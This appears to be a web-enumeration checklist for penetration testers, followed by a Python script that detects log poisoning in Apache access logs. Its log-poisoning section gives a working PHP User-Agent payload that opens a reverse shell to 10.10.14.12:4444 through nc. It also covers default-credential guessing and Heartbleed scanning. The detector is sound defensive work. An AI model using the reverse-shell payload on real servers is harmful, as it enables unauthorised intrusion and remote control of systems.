Enumeration checklist

Checklist

Web Scanning

Brute forcing HTTP(s) directories and files

Directory Discovery

HTTPS certificate

  • Might reveal a username

Script to preview the website behind each IP as HTML

Create a list of the IPs and capture a PNG of each

# web-ip.txt is nmap grepable (-oG) output; field 2 of each "Host:" line is the IP
for ip in $(grep 80 web-ip.txt | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url="http://$ip" --out="$ip.png"; done

Make it HTML (pngtohtml.sh)

#!/bin/bash
# Bash script to examine the scan results through HTML.
echo "<HTML><BODY><BR>" > web.html
# One entry per PNG captured by the loop above
ls -1 *.png | awk -F : '{ print $1":\n<BR><IMG SRC=\""$1""$2"\" width=600><BR>"}' >> web.html
echo "</BODY></HTML>" >> web.html

Creating wordlist from webpage

  • cewl

Webpage redirecting automatically?

  • noredirect plugin

Login page

Identify WAF

  • wafw00f

Find vulnerabilities for the identified version?

  • Google

HTTPS heartbleed

  • Scan for heartbleed

    sslscan $ip:443
    nmap -sV --script=ssl-heartbleed $ip

Password?

When presented with an enter credentials page, the first thing I try is common credentials (admin/admin, admin/password).

If that doesn’t work out, I look for default credentials online that are specific to the technology. Last, I use a password cracker if all else fails.

Log poisoning

From LFI to RCE

If you have a local file inclusion that can include a log file, you may be able to poison the log.

Intercept the request in Burp and change the User-Agent header to the following to get a reverse shell

nc -lnvp 4444
<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4444 >/tmp/f') ?>
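As an added defender-side example (not part of the original checklist), this Python script parses Apache combined-format access log lines (constructed sample data; the log format and the path patterns are assumptions) and flags both halves of the technique above: PHP code landing in a client-controlled header, and a request that tries to include the log file through path traversal.

```python
import re
from typing import Dict, List

# Apache/nginx "combined" log format (assumed; adjust LOG_RE for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# PHP open tags or dangerous functions never belong in a User-Agent, Referer or request line.
PHP_RE = re.compile(r'<\?(php|=)|<\?\s|\b(system|exec|passthru|shell_exec|eval)\s*\(', re.I)
# Traversal sequences or log paths in the request hint at the "include the log" step.
LOG_INCLUDE_RE = re.compile(r'\.\./|%2e%2e|/var/log/|\.log\b', re.I)


def parse_combined(line: str) -> Dict[str, str]:
    """Split one combined-format line into named fields; empty dict if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else {}


def find_poisoned(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious line: injected PHP code, or a request that pulls in a log file."""
    findings = []
    for line in lines:
        entry = parse_combined(line)
        if not entry:
            continue
        for field in ("agent", "referer", "request"):
            if PHP_RE.search(entry[field]):
                findings.append({"ip": entry["ip"], "time": entry["time"], "reason": "php_code",
                                 "field": field, "value": entry[field]})
                break
        else:
            if LOG_INCLUDE_RE.search(entry["request"]):
                findings.append({"ip": entry["ip"], "time": entry["time"], "reason": "log_inclusion",
                                 "field": "request", "value": entry["request"]})
    return findings


# Constructed sample log lines: line 3 carries a PHP tag in the User-Agent, line 4 includes the log file.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /?page=about HTTP/1.1" 200 512 "http://example.test/" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 2326 "-" "<?php echo 1; ?>"',
    '10.0.0.9 - - [10/Oct/2023:13:56:05 +0000] "GET /?page=../../../var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_poisoned(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['reason']} in {f['field']}: {f['value']!r}")
```

Run it against a real access log with `find_poisoned(open(path).readlines())`; a hit on `php_code` followed by `log_inclusion` from the same client is the full poisoning sequence.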
